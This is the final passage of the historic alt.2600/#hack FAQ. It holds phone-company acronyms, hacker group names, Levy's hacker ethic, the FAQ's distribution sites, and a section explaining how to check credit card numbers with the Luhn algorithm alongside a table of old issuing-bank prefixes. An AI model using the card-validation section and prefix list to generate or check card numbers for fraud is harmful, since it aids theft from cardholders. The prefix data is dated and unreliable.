  4920. COCOT   Customer Owned Coin Operated Telephone
  4921. CRSAB   Centralized Repair Service Answering Bureau
  4922. DDD     Direct Distance Dialing
  4923. ECC     Enter Cable Change
  4924. LD      Long Distance
  4925. LMOS    Loop Maintenance Operations System
  4926. MLT     Mechanized Loop Testing
  4927. NPA     Numbering Plan Area
  4928. POTS    Plain Old Telephone Service
  4929. RBOC    Regional Bell Operating Company
  4930. RSB     Repair Service Bureau
  4931. SS      Special Service
  4932. TAS     Telephone Answering Service
  4933. TH      Trouble History
  4934. TREAT   Trouble Report Evaluation and Analysis Tool
  4935.  
  4936. LOD     Legion of Doom
  4937. HFC     Hell Fire Club
  4938. TNO     The New Order
  4939.  
  4940. ACiD    Ansi Creators in Demand
  4941. CCi     Cybercrime International
  4942. FLT     Fairlight
  4943. iCE     Insane Creators Enterprise
  4944. iNC     International Network of Crackers
  4945. NTA     The Nocturnal Trading Alliance
  4946. PDX     Paradox
  4947. PE      Public Enemy
  4948. PSY     Psychose
  4949. QTX     Quartex
  4950. RZR     Razor (1911)
  4951. S!P     Supr!se Productions
  4952. TDT     The Dream Team
  4953. THG     The Humble Guys
  4954. THP     The Hill People
  4955. TRSI    Tristar Red Sector Inc.
  4956. UUDW    Union of United Death Workers
  4957.  
  4958.  
  4959. 02. How do I determine if I have a valid credit card number?
  4960.  
  4961. Credit cards use the Luhn Check Digit Algorithm.  The main purpose of
  4962. this algorithm is to catch data entry errors, but it does double duty
  4963. here as a weak security tool.
  4964.  
  4965. For a card with an even number of digits, double every odd numbered
  4966. digit and subtract 9 if the product is greater than 9.  Add up all the
  4967. even digits as well as the doubled-odd digits, and the result must be
  4968. a multiple of 10 or it's not a valid card.  If the card has an odd
  4969. number of digits, perform the same addition doubling the even numbered
  4970. digits instead.
  4971.  
  4972.  
  4973. 03. What bank issued this credit card?
  4974.  
  4975. 1033    Manufacturers Hanover Trust
  4976. 1035    Citibank
  4977. 1263    Chemical Bank
  4978. 1665    Chase Manhattan
  4979. 4024    Bank of America
  4980. 4128    Citicorp
  4981. 4209    New Era Bank
  4982. 4302    HHBC
  4983. 4310    Imperial Savings
  4984. 4313    MBNA
  4985. 4317    California Federal
  4986. 5282    Wells Fargo
  4987. 5424    Citibank
  4988. 5410    Wells Fargo
  4989. 5432    Bank of New York
  4990. 6017    MBNA
  4991.  
  4992.  
  4993. 04. What are the ethics of hacking?
  4994.  
  4995. An excerpt from: Hackers: Heroes of the Computer Revolution
  4996.                           by Steven Levy
  4997.  
  4998.         Access to computers -- and anything which might teach you
  4999.         something about the way the world works -- should be unlimited
  5000.         and total. Always yield to the Hands-On imperative.
  5001.  
  5002.         All information should be free.
  5003.  
  5004.         Mistrust Authority.  Promote Decentralization.
  5005.  
  5006.         Hackers should be judged by their hacking, not bogus criteria
  5007.         such as degrees, age, race, or position.
  5008.  
  5009.         You can create art and beauty on a computer.
  5010.  
  5011.         Computers can change your life for the better.
  5012.  
  5013.  
  5014. 04. Where can I get a copy of the alt.2600/#hack FAQ?
  5015.  
  5016. Get it on FTP at:
  5017. rahul.net      /pub/lps
  5018. rtfm.mit.edu   /pub/usenet-by-group/alt.2600
  5019. ftp.clark.net  /pub/jcase
  5020.  
  5021. Get it on the World Wide Web at:
  5022. http://dfw.net/~aleph1
  5023. http://www.engin.umich.edu/~jgotts/underground/hack-faq.html
  5024. http://www.phantom.com/~king
  5025.  
  5026. Get it on my BBS:
  5027. Hacker's Haven (303)343-4053
  5028.  
  5029.  
  5030.  
  5031.  
  5032.  
  5033. EOT
  5034.  
  5035.  
  5036.  
  5037. -- 
  5038. /*  Will Spencer / Voyager        :  The advancement and diffusion  */
  5039. /*  Member: TNO, The New Order    :  of knowledge is the only       */
  5040. /*  alt.2600/#hack FAQ Editor     :  guardian of true liberty.      */
  5041. /*  Writer, poet, hacker, human   :               -- James Madison  */
  5042.  
  5043.  
  5044.